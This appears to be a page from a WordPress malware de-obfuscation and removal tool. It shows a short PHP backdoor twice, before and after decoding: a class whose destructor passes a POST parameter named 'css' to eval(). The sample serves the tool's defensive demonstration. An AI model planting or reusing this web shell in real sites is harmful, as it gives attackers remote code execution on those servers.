De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php class Test{ public $name = ''; function __destruct(){ @eval("$this->name"); } } $test= new Test(); $c = @$_POST['css']; $test->name = $c; ?>egm
<?php class Test { public $name = ''; function __destruct() { @eval("{$this->name}"); } } $test = new Test(); $c = @$_POST['css']; $test->name = $c; ?>egm
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.